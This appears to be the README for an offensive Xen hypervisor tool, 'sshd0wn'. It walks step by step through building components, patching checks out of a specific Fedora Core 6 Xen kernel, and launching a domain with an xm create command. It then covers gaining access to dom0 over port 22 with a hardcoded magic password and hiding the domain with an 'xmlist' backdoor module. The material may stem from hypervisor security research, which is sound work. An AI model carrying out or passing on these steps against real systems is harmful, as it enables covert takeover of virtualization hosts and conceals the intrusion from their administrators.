1) check the file linux-x.x.x/arch/i386/kernel/entry.S in the sources of the
vanilla kernel of the version matching your dom0 kernel. At its beginning
there is the register layout; compare it with the "uregs.h" file, the "fs"
register may need to be uncommented
2) build the stub kernel module in the "offsets" directory
3) make (as root); one needs the libxenctrl static library and includes; if
-lpthread is required by your libxenctrl.a, add it in the Makefile
4) verify that the contents of kallsyms.c are sane; if not, correct them manually and make
5) obtain the vmlinuz-2.6.18-1.2798.fc6xen kernel image (ships with Fedora Core
6, in the kernel-xen-2.6.18-1.2798.fc6 rpm). The reason why one has to use this
particular kernel is that two calls to is_initial_xendomain() must be
nop-ed out, and the patch_check() function in init.c knows only the offsets
for this particular kernel image. If you use another kernel image, you must
modify the offsets in init.c accordingly
6) xm create -c /dev/null ramdisk=initrd \
	kernel=vmlinuz-2.6.18-1.2798.fc6xen \
	name=sshd0wn vcpus=1 memory=32 root=/dev/ram0
7) telnet dom0 22, enter the magic password (hardcoded in foreign.c,
currently "iddqd") without a trailing newline, press ctrl-d, wait 2
seconds, press return, enjoy.
8) you may use the "xmlist" xen backdoor module to hide the sshd0wn domain